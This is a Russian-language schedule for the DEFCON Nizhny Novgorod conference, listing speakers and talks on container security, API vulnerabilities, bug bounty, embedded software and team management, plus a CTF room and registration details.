// блок security 14:40 Как сделать контейнеры и работу с ними безопасными // Анатолий "rusdacent", Luntry, Санкт-Петербург
17:20 Актуальные вопросы и проблемы ИБ (закрытый круглый стол) // Константин Евдокимов, [MIS]Team, Москва и Илья Коцюба, исследователь/red team/purple team, threat intelligence
Аудитория 314: CTF
Стенд WifiWall-TestZone // Сергей Иващенко, Виктор Зварыкин и Евгений Артемьев, пентестеры в компании Инфосистемы Джет, Москва
25 февраля, воскресенье
Главная сцена
10:20 Прибытие участников
// блок software11:00 Опыт разработки оркестратора микросервисов для встроенных систем forc // Денис Королёв, инженер-программист в YADRO, Нижний Новгород и Николай Фадеев, инженер-программист в НПП "Прима", Нижний Новгород
11:20 Никто не боится D-Bus // Альберто Мардеган, ведущий разработчик в компании "Открытая мобильная платформа", Санкт-Петербург
12:00 Опыт разработки библиотеки представления и кодирования структурированных данных libucode // Вячеслав Капля, инженер-программист в НПП "Прима", Нижний Новгород
// блок security 12:40 Уязвимые API: приёмы и эксплуатация // Павел Степанов, независимый исследователь, Тула
14:20 Развитие фриланса в ИБ: вклад Bug Bounty платформ // Алексей Гришин, CPO CICADA8 команды инноваций МТС, Москва и Андрей Левкин, руководитель продукта BI.ZONE Bug Bounty, Москва
// блок management15:00 Вредные советы для руководителя, или Как завалить любой ИТ-проект // Егор Харченко, Лаборатория Касперского
15:40 Как масштабировать команду без тимлидов: опыт плоской организации в миниатюре // Wire Snark, DC7831, НПП "Прима", Нижний Новгород
16:00 Закрытие конференции
Аудитория 310: CTF
Стенд WifiWall-TestZone // Сергей Иващенко, Виктор Зварыкин и Евгений Артемьев, пентестеры в компании Инфосистемы Джет, Москва
Google Docs
Регистрация на конференцию DEFCON Нижний Новгород
- если вам понадобится розетка, просим по возможности захватить свой удлинитель/сетевой фильтр
👍1